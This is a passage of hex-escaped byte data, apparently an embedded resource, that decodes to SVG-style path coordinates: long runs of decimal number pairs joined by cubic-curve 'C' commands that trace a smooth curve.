\x30\x36\x38\x33\x38\x39\x32\x37\x35\x32\x34\x20\x39\x2e\x36\x30\
\x38\x37\x34\x35\x33\x32\x37\x34\x34\x20\x36\x2e\x30\x37\x34\x36\
\x33\x30\x33\x34\x34\x30\x38\x20\x39\x2e\x36\x33\x34\x36\x31\x34\
\x39\x31\x32\x31\x32\x20\x36\x2e\x30\x38\x30\x38\x37\x31\x34\x31\
\x32\x39\x32\x20\x39\x2e\x36\x36\x31\x31\x32\x34\x32\x35\x31\x38\
\x35\x20\x43\x20\x36\x2e\x30\x38\x37\x31\x31\x32\x34\x38\x31\x37\
\x35\x20\x39\x2e\x36\x38\x37\x36\x33\x33\x35\x39\x31\x35\x38\x20\
\x36\x2e\x30\x39\x33\x33\x35\x33\x35\x35\x30\x35\x39\x20\x39\x2e\
\x37\x31\x34\x37\x38\x36\x35\x33\x32\x39\x39\x20\x36\x2e\x30\x39\
\x39\x35\x39\x34\x36\x31\x39\x34\x32\x20\x39\x2e\x37\x34\x32\x35\
\x35\x38\x33\x30\x36\x30\x38\x20\x43\x20\x36\x2e\x31\x30\x35\x38\
\x33\x35\x36\x38\x38\x32\x36\x20\x39\x2e\x37\x37\x30\x33\x33\x30\
\x30\x37\x39\x31\x37\x20\x36\x2e\x31\x31\x32\x30\x37\x36\x37\x35\
\x37\x31\x20\x39\x2e\x37\x39\x38\x37\x32\x34\x34\x30\x34\x36\x20\
\x36\x2e\x31\x31\x38\x33\x31\x37\x38\x32\x35\x39\x33\x20\x39\x2e\
\x38\x32\x37\x37\x31\x35\x36\x38\x31\x37\x35\x20\x43\x20\x36\x2e\
\x31\x32\x34\x35\x35\x38\x38\x39\x34\x37\x37\x20\x39\x2e\x38\x35\
\x36\x37\x30\x36\x39\x35\x38\x38\x39\x20\x36\x2e\x31\x33\x30\x37\
\x39\x39\x39\x36\x33\x36\x20\x39\x2e\x38\x38\x36\x32\x39\x38\x37\
\x37\x36\x37\x20\x36\x2e\x31\x33\x37\x30\x34\x31\x30\x33\x32\x34\
\x34\x20\x39\x2e\x39\x31\x36\x34\x36\x34\x37\x34\x33\x35\x20\x43\
\x20\x36\x2e\x31\x34\x33\x32\x38\x32\x31\x30\x31\x32\x38\x20\x39\
\x2e\x39\x34\x36\x36\x33\x30\x37\x31\x30\x33\x20\x36\x2e\x31\x34\
\x39\x35\x32\x33\x31\x37\x30\x31\x31\x20\x39\x2e\x39\x37\x37\x33\
\x37\x34\x32\x37\x37\x37\x39\x20\x36\x2e\x31\x35\x35\x37\x36\x34\
\x32\x33\x38\x39\x35\x20\x31\x30\x2e\x30\x30\x38\x36\x36\x38\x33\
\x30\x34\x20\x43\x20\x36\x2e\x31\x36\x32\x30\x30\x35\x33\x30\x37\
\x37\x38\x20\x31\x30\x2e\x30\x33\x39\x39\x36\x32\x33\x33\x30\x33\
\x20\x36\x2e\x31\x36\x38\x32\x34\x36\x33\x37\x36\x36\x32\x20\x31\
\x30\x2e\x30\x37\x31\x38\x31\x30\x31\x32\x34\x33\x20\x36\x2e\x31\
\x37\x34\x34\x38\x37\x34\x34\x35\x34\x36\x20\x31\x30\x2e\x31\x30\
\x34\x31\x38\x33\x38\x33\x36\x20\x43\x20\x36\x2e\x31\x38\x30\x37\
\x32\x38\x35\x31\x34\x32\x39\x20\x31\x30\x2e\x31\x33\x36\x35\x35\
\x37\x35\x34\x37\x37\x20\x36\x2e\x31\x38\x36\x39\x36\x39\x35\x38\
\x33\x31\x33\x20\x31\x30\x2e\x31\x36\x39\x34\x36\x30\x33\x33\x38\
\x35\x20\x36\x2e\x31\x39\x33\x32\x31\x30\x36\x35\x31\x39\x36\x20\
\x31\x30\x2e\x32\x30\x32\x38\x36\x33\x36\x39\x32\x37\x20\x43\x20\
\x36\x2e\x31\x39\x39\x34\x35\x31\x37\x32\x30\x38\x20\x31\x30\x2e\
\x32\x33\x36\x32\x36\x37\x30\x34\x36\x39\x20\x36\x2e\x32\x30\x35\
\x36\x39\x32\x37\x38\x39\x36\x34\x20\x31\x30\x2e\x32\x37\x30\x31\
\x37\x33\x39\x37\x33\x35\x20\x36\x2e\x32\x31\x31\x39\x33\x33\x38\
\x35\x38\x34\x37\x20\x31\x30\x2e\x33\x30\x34\x35\x35\x35\x33\x33\
\x35\x38\x20\x43\x20\x36\x2e\x32\x31\x38\x31\x37\x34\x39\x32\x37\
\x33\x31\x20\x31\x30\x2e\x33\x33\x38\x39\x33\x36\x36\x39\x38\x20\
\x36\x2e\x32\x32\x34\x34\x31\x35\x39\x39\x36\x31\x35\x20\x31\x30\
\x2e\x33\x37\x33\x37\x39\x35\x33\x34\x37\x35\x20\x36\x2e\x32\x33\
\x30\x36\x35\x37\x30\x36\x34\x39\x38\x20\x31\x30\x2e\x34\x30\x39\
\x31\x30\x31\x35\x37\x31\x34\x20\x43\x20\x36\x2e\x32\x33\x36\x38\
\x39\x38\x31\x33\x33\x38\x32\x20\x31\x30\x2e\x34\x34\x34\x34\x30\
\x37\x37\x39\x35\x33\x20\x36\x2e\x32\x34\x33\x31\x33\x39\x32\x30\
\x32\x36\x35\x20\x31\x30\x2e\x34\x38\x30\x31\x36\x34\x32\x38\x33\
\x35\x20\x36\x2e\x32\x34\x39\x33\x38\x30\x32\x37\x31\x34\x39\x20\
\x31\x30\x2e\x35\x31\x36\x33\x34\x30\x37\x39\x33\x31\x20\x43\x20\
\x36\x2e\x32\x35\x35\x36\x32\x31\x33\x34\x30\x33\x33\x20\x31\x30\
\x2e\x35\x35\x32\x35\x31\x37\x33\x30\x32\x37\x20\x36\x2e\x32\x36\
\x31\x38\x36\x32\x34\x30\x39\x31\x36\x20\x31\x30\x2e\x35\x38\x39\
\x31\x31\x36\x33\x35\x37\x38\x20\x36\x2e\x32\x36\x38\x31\x30\x33\
\x34\x37\x38\x20\x31\x30\x2e\x36\x32\x36\x31\x30\x37\x32\x33\x31\
\x38\x20\x43\x20\x36\x2e\x32\x37\x34\x33\x34\x34\x35\x34\x36\x38\
\x33\x20\x31\x30\x2e\x36\x36\x33\x30\x39\x38\x31\x30\x35\x38\x20\
\x36\x2e\x32\x38\x30\x35\x38\x35\x36\x31\x35\x36\x37\x20\x31\x30\
\x2e\x37\x30\x30\x34\x38\x33\x31\x35\x33\x32\x20\x36\x2e\x32\x38\
\x36\x38\x32\x36\x36\x38\x34\x35\x31\x20\x31\x30\x2e\x37\x33\x38\
\x32\x33\x31\x32\x31\x31\x36\x20\x43\x20\x36\x2e\x32\x39\x33\x30\
\x36\x37\x37\x35\x33\x33\x34\x20\x31\x30\x2e\x37\x37\x35\x39\x37\
\x39\x32\x37\x20\x36\x2e\x32\x39\x39\x33\x30\x38\x38\x32\x32\x31\
\x38\x20\x31\x30\x2e\x38\x31\x34\x30\x39\x32\x35\x32\x30\x34\x20\
\x36\x2e\x33\x30\x35\x35\x34\x39\x38\x39\x31\x30\x31\x20\x31\x30\
\x2e\x38\x35\x32\x35\x33\x39\x34\x31\x32\x35\x20\x43\x20\x36\x2e\
\x33\x31\x31\x37\x39\x30\x39\x35\x39\x38\x35\x20\x31\x30\x2e\x38\
\x39\x30\x39\x38\x36\x33\x30\x34\x37\x20\x36\x2e\x33\x31\x38\x30\
\x33\x32\x30\x32\x38\x36\x39\x20\x31\x30\x2e\x39\x32\x39\x37\x36\
\x38\x38\x34\x33\x20\x36\x2e\x33\x32\x34\x32\x37\x33\x30\x39\x37\
\x35\x32\x20\x31\x30\x2e\x39\x36\x38\x38\x35\x35\x31\x33\x38\x33\
\x20\x43\x20\x36\x2e\x33\x33\x30\x35\x31\x34\x31\x36\x36\x33\x36\
\x20\x31\x31\x2e\x30\x30\x37\x39\x34\x31\x34\x33\x33\x35\x20\x36\
\x2e\x33\x33\x36\x37\x35\x35\x32\x33\x35\x31\x39\x20\x31\x31\x2e\
\x30\x34\x37\x33\x33\x33\x33\x31\x30\x31\x20\x36\x2e\x33\x34\x32\
\x39\x39\x36\x33\x30\x34\x30\x33\x20\x31\x31\x2e\x30\x38\x36\x39\
\x39\x38\x35\x38\x39\x31\x20\x43\x20\x36\x2e\x33\x34\x39\x32\x33\
\x37\x33\x37\x32\x38\x37\x20\x31\x31\x2e\x31\x32\x36\x36\x36\x33\
\x38\x36\x38\x32\x20\x36\x2e\x33\x35\x35\x34\x37\x38\x34\x34\x31\
\x37\x20\x31\x31\x2e\x31\x36\x36\x36\x30\x34\x31\x39\x31\x36\x20\
\x36\x2e\x33\x36\x31\x37\x31\x39\x35\x31\x30\x35\x34\x20\x31\x31\
\x2e\x32\x30\x36\x37\x38\x37\x31\x34\x30\x34\x20\x43\x20\x36\x2e\
\x33\x36\x37\x39\x36\x30\x35\x37\x39\x33\x37\x20\x31\x31\x2e\x32\
\x34\x36\x39\x37\x30\x30\x38\x39\x31\x20\x36\x2e\x33\x37\x34\x32\
\x30\x31\x36\x34\x38\x32\x31\x20\x31\x31\x2e\x32\x38\x37\x33\x39\
\x37\x31\x31\x39\x39\x20\x36\x2e\x33\x38\x30\x34\x34\x32\x37\x31\
\x37\x30\x35\x20\x31\x31\x2e\x33\x32\x38\x30\x33\x35\x36\x32\x34\
\x31\x20\x43\x20\x36\x2e\x33\x38\x36\x36\x38\x33\x37\x38\x35\x38\
\x38\x20\x31\x31\x2e\x33\x36\x38\x36\x37\x34\x31\x32\x38\x32\x20\
\x36\x2e\x33\x39\x32\x39\x32\x34\x38\x35\x34\x37\x32\x20\x31\x31\
\x2e\x34\x30\x39\x35\x32\x35\x33\x37\x34\x38\x20\x36\x2e\x33\x39\
\x39\x31\x36\x35\x39\x32\x33\x35\x35\x20\x31\x31\x2e\x34\x35\x30\
\x35\x35\x36\x36\x31\x35\x37\x20\x43\x20\x36\x2e\x34\x30\x35\x34\
\x30\x36\x39\x39\x32\x33\x39\x20\x31\x31\x2e\x34\x39\x31\x35\x38\
\x37\x38\x35\x36\x36\x20\x36\x2e\x34\x31\x31\x36\x34\x38\x30\x36\
\x31\x32\x33\x20\x31\x31\x2e\x35\x33\x32\x38\x30\x30\x31\x37\x31\
\x35\x20\x36\x2e\x34\x31\x37\x38\x38\x39\x31\x33\x30\x30\x36\x20\
\x31\x31\x2e\x35\x37\x34\x31\x36\x30\x37\x32\x33\x36\x20\x43\x20\
\x36\x2e\x34\x32\x34\x31\x33\x30\x31\x39\x38\x39\x20\x31\x31\x2e\
\x36\x31\x35\x35\x32\x31\x32\x37\x35\x36\x20\x36\x2e\x34\x33\x30\
\x33\x37\x31\x32\x36\x37\x37\x33\x20\x31\x31\x2e\x36\x35\x37\x30\
\x33\x30\x39\x35\x33\x34\x20\x36\x2e\x34\x33\x36\x36\x31\x32\x33\
\x33\x36\x35\x37\x20\x31\x31\x2e\x36\x39\x38\x36\x35\x36\x38\x38\
\x31\x39\x20\x43\x20\x36\x2e\x34\x34\x32\x38\x35\x33\x34\x30\x35\
\x34\x31\x20\x31\x31\x2e\x37\x34\x30\x32\x38\x32\x38\x31\x30\x34\
\x20\x36\x2e\x34\x34\x39\x30\x39\x34\x34\x37\x34\x32\x34\x20\x31\
\x31\x2e\x37\x38\x32\x30\x32\x35\x36\x38\x35\x38\x20\x36\x2e\x34\
\x35\x35\x33\x33\x35\x35\x34\x33\x30\x38\x20\x31\x31\x2e\x38\x32\
\x33\x38\x35\x32\x36\x34\x35\x38\x20\x43\x20\x36\x2e\x34\x36\x31\
\x35\x37\x36\x36\x31\x31\x39\x31\x20\x31\x31\x2e\x38\x36\x35\x36\
\x37\x39\x36\x30\x35\x39\x20\x36\x2e\x34\x36\x37\x38\x31\x37\x36\
\x38\x30\x37\x35\x20\x31\x31\x2e\x39\x30\x37\x35\x39\x31\x31\x35\
\x33\x32\x20\x36\x2e\x34\x37\x34\x30\x35\x38\x37\x34\x39\x35\x39\
\x20\x31\x31\x2e\x39\x34\x39\x35\x35\x34\x34\x38\x39\x32\x20\x43\
\x20\x36\x2e\x34\x38\x30\x32\x39\x39\x38\x31\x38\x34\x32\x20\x31\
\x31\x2e\x39\x39\x31\x35\x31\x37\x38\x32\x35\x31\x20\x36\x2e\x34\
\x38\x36\x35\x34\x30\x38\x38\x37\x32\x36\x20\x31\x32\x2e\x30\x33\
\x33\x35\x33\x33\x32\x35\x38\x20\x36\x2e\x34\x39\x32\x37\x38\x31\
\x39\x35\x36\x31\x20\x31\x32\x2e\x30\x37\x35\x35\x36\x38\x31\x30\
\x33\x33\x20\x43\x20\x36\x2e\x34\x39\x39\x30\x32\x33\x30\x32\x34\
\x39\x33\x20\x31\x32\x2e\x31\x31\x37\x36\x30\x32\x39\x34\x38\x36\
\x20\x36\x2e\x35\x30\x35\x32\x36\x34\x30\x39\x33\x37\x37\x20\x31\
\x32\x2e\x31\x35\x39\x36\x35\x37\x33\x32\x30\x31\x20\x36\x2e\x35\
\x31\x31\x35\x30\x35\x31\x36\x32\x36\x20\x31\x32\x2e\x32\x30\x31\
\x36\x39\x38\x36\x39\x37\x38\x20\x43\x20\x36\x2e\x35\x31\x37\x37\
\x34\x36\x32\x33\x31\x34\x34\x20\x31\x32\x2e\x32\x34\x33\x37\x34\
\x30\x30\x37\x35\x36\x20\x36\x2e\x35\x32\x33\x39\x38\x37\x33\x30\
\x30\x32\x38\x20\x31\x32\x2e\x32\x38\x35\x37\x36\x38\x33\x37\x38\
\x34\x20\x36\x2e\x35\x33\x30\x32\x32\x38\x33\x36\x39\x31\x31\x20\
\x31\x32\x2e\x33\x32\x37\x37\x35\x31\x33\x30\x31\x34\x20\x43\x20\
\x36\x2e\x35\x33\x36\x34\x36\x39\x34\x33\x37\x39\x35\x20\x31\x32\
\x2e\x33\x36\x39\x37\x33\x34\x32\x32\x34\x35\x20\x36\x2e\x35\x34\
\x32\x37\x31\x30\x35\x30\x36\x37\x38\x20\x31\x32\x2e\x34\x31\x31\
\x36\x37\x31\x34\x39\x31\x37\x20\x36\x2e\x35\x34\x38\x39\x35\x31\
\x35\x37\x35\x36\x32\x20\x31\x32\x2e\x34\x35\x33\x35\x33\x31\x30\
\x36\x33\x33\x20\x43\x20\x36\x2e\x35\x35\x35\x31\x39\x32\x36\x34\
\x34\x34\x36\x20\x31\x32\x2e\x34\x39\x35\x33\x39\x30\x36\x33\x35\
\x20\x36\x2e\x35\x36\x31\x34\x33\x33\x37\x31\x33\x32\x39\x20\x31\
\x32\x2e\x35\x33\x37\x31\x37\x32\x30\x34\x30\x35\x20\x36\x2e\x35\
\x36\x37\x36\x37\x34\x37\x38\x32\x31\x33\x20\x31\x32\x2e\x35\x37\
\x38\x38\x34\x33\x35\x35\x34\x36\x20\x43\x20\x36\x2e\x35\x37\x33\
\x39\x31\x35\x38\x35\x30\x39\x36\x20\x31\x32\x2e\x36\x32\x30\x35\
\x31\x35\x30\x36\x38\x37\x20\x36\x2e\x35\x38\x30\x31\x35\x36\x39\
\x31\x39\x38\x20\x31\x32\x2e\x36\x36\x32\x30\x37\x36\x30\x32\x37\
\x33\x20\x36\x2e\x35\x38\x36\x33\x39\x37\x39\x38\x38\x36\x34\x20\
\x31\x32\x2e\x37\x30\x33\x34\x39\x35\x30\x36\x38\x35\x20\x43\x20\
\x36\x2e\x35\x39\x32\x36\x33\x39\x30\x35\x37\x34\x37\x20\x31\x32\
\x2e\x37\x34\x34\x39\x31\x34\x31\x30\x39\x38\x20\x36\x2e\x35\x39\
\x38\x38\x38\x30\x31\x32\x36\x33\x31\x20\x31\x32\x2e\x37\x38\x36\
\x31\x39\x30\x33\x37\x36\x39\x20\x36\x2e\x36\x30\x35\x31\x32\x31\
\x31\x39\x35\x31\x34\x20\x31\x32\x2e\x38\x32\x37\x32\x39\x32\x39\
\x32\x30\x32\x20\x43\x20\x36\x2e\x36\x31\x31\x33\x36\x32\x32\x36\
\x33\x39\x38\x20\x31\x32\x2e\x38\x36\x38\x33\x39\x35\x34\x36\x33\
\x35\x20\x36\x2e\x36\x31\x37\x36\x30\x33\x33\x33\x32\x38\x32\x20\
\x31\x32\x2e\x39\x30\x39\x33\x32\x33\x32\x33\x34\x38\x20\x36\x2e\
\x36\x32\x33\x38\x34\x34\x34\x30\x31\x36\x35\x20\x31\x32\x2e\x39\
\x35\x30\x30\x34\x35\x37\x34\x34\x32\x20\x43\x20\x36\x2e\x36\x33\
\x30\x30\x38\x35\x34\x37\x30\x34\x39\x20\x31\x32\x2e\x39\x39\x30\
\x37\x36\x38\x32\x35\x33\x36\x20\x36\x2e\x36\x33\x36\x33\x32\x36\
\x35\x33\x39\x33\x32\x20\x31\x33\x2e\x30\x33\x31\x32\x38\x34\x32\
\x36\x33\x34\x20\x36\x2e\x36\x34\x32\x35\x36\x37\x36\x30\x38\x31\
\x36\x20\x31\x33\x2e\x30\x37\x31\x35\x36\x33\x37\x39\x30\x36\x20\
\x43\x20\x36\x2e\x36\x34\x38\x38\x30\x38\x36\x37\x37\x20\x31\x33\
\x2e\x31\x31\x31\x38\x34\x33\x33\x31\x37\x38\x20\x36\x2e\x36\x35\
\x35\x30\x34\x39\x37\x34\x35\x38\x33\x20\x31\x33\x2e\x31\x35\x31\
\x38\x38\x34\x39\x33\x36\x38\x20\x36\x2e\x36\x36\x31\x32\x39\x30\
\x38\x31\x34\x36\x37\x20\x31\x33\x2e\x31\x39\x31\x36\x35\x39\x32\
\x31\x38\x31\x20\x43\x20\x36\x2e\x36\x36\x37\x35\x33\x31\x38\x38\
\x33\x35\x20\x31\x33\x2e\x32\x33\x31\x34\x33\x33\x34\x39\x39\x34\
\x20\x36\x2e\x36\x37\x33\x37\x37\x32\x39\x35\x32\x33\x34\x20\x31\
\x33\x2e\x32\x37\x30\x39\x33\x38\x38\x33\x31\x38\x20\x36\x2e\x36\
\x38\x30\x30\x31\x34\x30\x32\x31\x31\x38\x20\x31\x33\x2e\x33\x31\
\x30\x31\x34\x36\x33\x38\x34\x35\x20\x43\x20\x36\x2e\x36\x38\x36\
\x32\x35\x35\x30\x39\x30\x30\x31\x20\x31\x33\x2e\x33\x34\x39\x33\
\x35\x33\x39\x33\x37\x32\x20\x36\x2e\x36\x39\x32\x34\x39\x36\x31\
\x35\x38\x38\x35\x20\x31\x33\x2e\x33\x38\x38\x32\x36\x31\x39\x31\
\x36\x31\x20\x36\x2e\x36\x39\x38\x37\x33\x37\x32\x32\x37\x36\x38\
\x20\x31\x33\x2e\x34\x32\x36\x38\x34\x32\x31\x33\x33\x36\x20\x43\
\x20\x36\x2e\x37\x30\x34\x39\x37\x38\x32\x39\x36\x35\x32\x20\x31\
\x33\x2e\x34\x36\x35\x34\x32\x32\x33\x35\x31\x32\x20\x36\x2e\x37\
\x31\x31\x32\x31\x39\x33\x36\x35\x33\x36\x20\x31\x33\x2e\x35\x30\
\x33\x36\x37\x32\x38\x33\x33\x20\x36\x2e\x37\x31\x37\x34\x36\x30\
\x34\x33\x34\x31\x39\x20\x31\x33\x2e\x35\x34\x31\x35\x36\x36\x30\
\x37\x38\x35\x20\x43\x20\x36\x2e\x37\x32\x33\x37\x30\x31\x35\x30\
\x33\x30\x33\x20\x31\x33\x2e\x35\x37\x39\x34\x35\x39\x33\x32\x34\
\x31\x20\x36\x2e\x37\x32\x39\x39\x34\x32\x35\x37\x31\x38\x36\x20\
\x31\x33\x2e\x36\x31\x36\x39\x39\x33\x31\x38\x31\x36\x20\x36\x2e\
\x37\x33\x36\x31\x38\x33\x36\x34\x30\x37\x20\x31\x33\x2e\x36\x35\
\x34\x31\x34\x30\x38\x38\x30\x31\x20\x43\x20\x36\x2e\x37\x34\x32\
\x34\x32\x34\x37\x30\x39\x35\x34\x20\x31\x33\x2e\x36\x39\x31\x32\
\x38\x38\x35\x37\x38\x36\x20\x36\x2e\x37\x34\x38\x36\x36\x35\x37\
\x37\x38\x33\x37\x20\x31\x33\x2e\x37\x32\x38\x30\x34\x37\x37\x39\
\x32\x35\x20\x36\x2e\x37\x35\x34\x39\x30\x36\x38\x34\x37\x32\x31\
\x20\x31\x33\x2e\x37\x36\x34\x33\x39\x32\x35\x32\x31\x35\x20\x43\
\x20\x36\x2e\x37\x36\x31\x31\x34\x37\x39\x31\x36\x30\x35\x20\x31\
\x33\x2e\x38\x30\x30\x37\x33\x37\x32\x35\x30\x35\x20\x36\x2e\x37\
\x36\x37\x33\x38\x38\x39\x38\x34\x38\x38\x20\x31\x33\x2e\x38\x33\
\x36\x36\x36\x34\x39\x39\x38\x37\x20\x36\x2e\x37\x37\x33\x36\x33\
\x30\x30\x35\x33\x37\x32\x20\x31\x33\x2e\x38\x37\x32\x31\x35\x30\
\x35\x37\x36\x39\x20\x43\x20\x36\x2e\x37\x37\x39\x38\x37\x31\x31\
\x32\x32\x35\x35\x20\x31\x33\x2e\x39\x30\x37\x36\x33\x36\x31\x35\
\x35\x31\x20\x36\x2e\x37\x38\x36\x31\x31\x32\x31\x39\x31\x33\x39\
\x20\x31\x33\x2e\x39\x34\x32\x36\x37\x36\x39\x30\x30\x39\x20\x36\
\x2e\x37\x39\x32\x33\x35\x33\x32\x36\x30\x32\x33\x20\x31\x33\x2e\
\x39\x37\x37\x32\x34\x38\x34\x37\x35\x31\x20\x43\x20\x36\x2e\x37\
\x39\x38\x35\x39\x34\x33\x32\x39\x30\x36\x20\x31\x34\x2e\x30\x31\
\x31\x38\x32\x30\x30\x34\x39\x33\x20\x36\x2e\x38\x30\x34\x38\x33\
\x35\x33\x39\x37\x39\x20\x31\x34\x2e\x30\x34\x35\x39\x31\x39\x36\
\x32\x37\x31\x20\x36\x2e\x38\x31\x31\x30\x37\x36\x34\x36\x36\x37\
\x33\x20\x31\x34\x2e\x30\x37\x39\x35\x32\x33\x37\x35\x36\x39\x20\
\x43\x20\x36\x2e\x38\x31\x37\x33\x31\x37\x35\x33\x35\x35\x37\x20\
\x31\x34\x2e\x31\x31\x33\x31\x32\x37\x38\x38\x36\x38\x20\x36\x2e\
\x38\x32\x33\x35\x35\x38\x36\x30\x34\x34\x31\x20\x31\x34\x2e\x31\
\x34\x36\x32\x33\x33\x35\x38\x35\x38\x20\x36\x2e\x38\x32\x39\x37\
\x39\x39\x36\x37\x33\x32\x34\x20\x31\x34\x2e\x31\x37\x38\x38\x31\
\x38\x33\x32\x36\x33\x20\x43\x20\x36\x2e\x38\x33\x36\x30\x34\x30\
\x37\x34\x32\x30\x38\x20\x31\x34\x2e\x32\x31\x31\x34\x30\x33\x30\
\x36\x36\x39\x20\x36\x2e\x38\x34\x32\x32\x38\x31\x38\x31\x30\x39\
\x31\x20\x31\x34\x2e\x32\x34\x33\x34\x36\x33\x37\x31\x32\x37\x20\
\x36\x2e\x38\x34\x38\x35\x32\x32\x38\x37\x39\x37\x35\x20\x31\x34\
\x2e\x32\x37\x34\x39\x37\x38\x36\x39\x34\x39\x20\x43\x20\x36\x2e\
\x38\x35\x34\x37\x36\x33\x39\x34\x38\x35\x39\x20\x31\x34\x2e\x33\
\x30\x36\x34\x39\x33\x36\x37\x37\x31\x20\x36\x2e\x38\x36\x31\x30\
\x30\x35\x30\x31\x37\x34\x32\x20\x31\x34\x2e\x33\x33\x37\x34\x35\
\x39\x37\x31\x30\x37\x20\x36\x2e\x38\x36\x37\x32\x34\x36\x30\x38\
\x36\x32\x36\x20\x31\x34\x2e\x33\x36\x37\x38\x35\x36\x32\x31\x38\
\x39\x20\x43\x20\x36\x2e\x38\x37\x33\x34\x38\x37\x31\x35\x35\x30\
\x39\x20\x31\x34\x2e\x33\x39\x38\x32\x35\x32\x37\x32\x37\x32\x20\
\x36\x2e\x38\x37\x39\x37\x32\x38\x32\x32\x33\x39\x33\x20\x31\x34\
\x2e\x34\x32\x38\x30\x37\x36\x32\x38\x31\x37\x20\x36\x2e\x38\x38\
\x35\x39\x36\x39\x32\x39\x32\x37\x37\x20\x31\x34\x2e\x34\x35\x37\
\x33\x30\x37\x33\x32\x39\x34\x20\x43\x20\x36\x2e\x38\x39\x32\x32\
\x31\x30\x33\x36\x31\x36\x20\x31\x34\x2e\x34\x38\x36\x35\x33\x38\
\x33\x37\x37\x32\x20\x36\x2e\x38\x39\x38\x34\x35\x31\x34\x33\x30\
\x34\x34\x20\x31\x34\x2e\x35\x31\x35\x31\x37\x33\x33\x35\x31\x36\
\x20\x36\x2e\x39\x30\x34\x36\x39\x32\x34\x39\x39\x32\x37\x20\x31\
\x34\x2e\x35\x34\x33\x31\x39\x33\x37\x35\x33\x38\x20\x43\x20\x36\
\x2e\x39\x31\x30\x39\x33\x33\x35\x36\x38\x31\x31\x20\x31\x34\x2e\
\x35\x37\x31\x32\x31\x34\x31\x35\x36\x20\x36\x2e\x39\x31\x37\x31\
\x37\x34\x36\x33\x36\x39\x35\x20\x31\x34\x2e\x35\x39\x38\x36\x31\
\x36\x32\x38\x36\x37\x20\x36\x2e\x39\x32\x33\x34\x31\x35\x37\x30\
\x35\x37\x38\x20\x31\x34\x2e\x36\x32\x35\x33\x38\x32\x37\x32\x39\
\x37\x20\x43\x20\x36\x2e\x39\x32\x39\x36\x35\x36\x37\x37\x34\x36\
\x32\x20\x31\x34\x2e\x36\x35\x32\x31\x34\x39\x31\x37\x32\x37\x20\
\x36\x2e\x39\x33\x35\x38\x39\x37\x38\x34\x33\x34\x35\x20\x31\x34\
\x2e\x36\x37\x38\x32\x37\x36\x31\x30\x31\x39\x20\x36\x2e\x39\x34\
\x32\x31\x33\x38\x39\x31\x32\x32\x39\x20\x31\x34\x2e\x37\x30\x33\
\x37\x34\x37\x32\x31\x30\x34\x20\x43\x20\x36\x2e\x39\x34\x38\x33\
\x37\x39\x39\x38\x31\x31\x33\x20\x31\x34\x2e\x37\x32\x39\x32\x31\
\x38\x33\x31\x39\x20\x36\x2e\x39\x35\x34\x36\x32\x31\x30\x34\x39\
\x39\x36\x20\x31\x34\x2e\x37\x35\x34\x30\x32\x39\x36\x35\x39\x38\
\x20\x36\x2e\x39\x36\x30\x38\x36\x32\x31\x31\x38\x38\x20\x31\x34\
\x2e\x37\x37\x38\x31\x36\x36\x30\x36\x30\x39\x20\x43\x20\x36\x2e\
\x39\x36\x37\x31\x30\x33\x31\x38\x37\x36\x33\x20\x31\x34\x2e\x38\
\x30\x32\x33\x30\x32\x34\x36\x32\x31\x20\x36\x2e\x39\x37\x33\x33\
\x34\x34\x32\x35\x36\x34\x37\x20\x31\x34\x2e\x38\x32\x35\x37\x35\
\x39\x38\x36\x31\x35\x20\x36\x2e\x39\x37\x39\x35\x38\x35\x33\x32\
\x35\x33\x31\x20\x31\x34\x2e\x38\x34\x38\x35\x32\x34\x32\x34\x35\
\x34\x20\x43\x20\x36\x2e\x39\x38\x35\x38\x32\x36\x33\x39\x34\x31\
\x34\x20\x31\x34\x2e\x38\x37\x31\x32\x38\x38\x36\x32\x39\x33\x20\
\x36\x2e\x39\x39\x32\x30\x36\x37\x34\x36\x32\x39\x38\x20\x31\x34\
\x2e\x38\x39\x33\x33\x35\x35\x38\x32\x37\x31\x20\x36\x2e\x39\x39\
\x38\x33\x30\x38\x35\x33\x31\x38\x31\x20\x31\x34\x2e\x39\x31\x34\
\x37\x31\x33\x30\x30\x34\x39\x20\x43\x20\x37\x2e\x30\x30\x34\x35\
\x34\x39\x36\x30\x30\x36\x35\x20\x31\x34\x2e\x39\x33\x36\x30\x37\
\x30\x31\x38\x32\x37\x20\x37\x2e\x30\x31\x30\x37\x39\x30\x36\x36\
\x39\x34\x39\x20\x31\x34\x2e\x39\x35\x36\x37\x31\x33\x30\x36\x37\
\x36\x20\x37\x2e\x30\x31\x37\x30\x33\x31\x37\x33\x38\x33\x32\x20\
\x31\x34\x2e\x39\x37\x36\x36\x33\x30\x30\x32\x35\x36\x20\x43\x20\
\x37\x2e\x30\x32\x33\x32\x37\x32\x38\x30\x37\x31\x36\x20\x31\x34\
\x2e\x39\x39\x36\x35\x34\x36\x39\x38\x33\x36\x20\x37\x2e\x30\x32\
\x39\x35\x31\x33\x38\x37\x36\x20\x31\x35\x2e\x30\x31\x35\x37\x33\
\x33\x36\x34\x36\x31\x20\x37\x2e\x30\x33\x35\x37\x35\x34\x39\x34\
\x34\x38\x33\x20\x31\x35\x2e\x30\x33\x34\x31\x37\x39\x35\x39\x36\
\x38\x20\x43\x20\x37\x2e\x30\x34\x31\x39\x39\x36\x30\x31\x33\x36\
\x37\x20\x31\x35\x2e\x30\x35\x32\x36\x32\x35\x35\x34\x37\x35\x20\
\x37\x2e\x30\x34\x38\x32\x33\x37\x30\x38\x32\x35\x20\x31\x35\x2e\
\x30\x37\x30\x33\x32\x36\x33\x32\x39\x31\x20\x37\x2e\x30\x35\x34\
\x34\x37\x38\x31\x35\x31\x33\x34\x20\x31\x35\x2e\x30\x38\x37\x32\
\x37\x32\x37\x35\x39\x31\x20\x43\x20\x37\x2e\x30\x36\x30\x37\x31\
\x39\x32\x32\x30\x31\x38\x20\x31\x35\x2e\x31\x30\x34\x32\x31\x39\
\x31\x38\x39\x20\x37\x2e\x30\x36\x36\x39\x36\x30\x32\x38\x39\x30\
\x31\x20\x31\x35\x2e\x31\x32\x30\x34\x30\x36\x37\x32\x38\x20\x37\
\x2e\x30\x37\x33\x32\x30\x31\x33\x35\x37\x38\x35\x20\x31\x35\x2e\
\x31\x33\x35\x38\x32\x37\x34\x34\x31\x35\x20\x43\x20\x37\x2e\x30\
\x37\x39\x34\x34\x32\x34\x32\x36\x36\x38\x20\x31\x35\x2e\x31\x35\
\x31\x32\x34\x38\x31\x35\x35\x20\x37\x2e\x30\x38\x35\x36\x38\x33\
\x34\x39\x35\x35\x32\x20\x31\x35\x2e\x31\x36\x35\x38\x39\x37\x34\
\x32\x38\x39\x20\x37\x2e\x30\x39\x31\x39\x32\x34\x35\x36\x34\x33\
\x36\x20\x31\x35\x2e\x31\x37\x39\x37\x36\x38\x35\x38\x38\x38\x20\
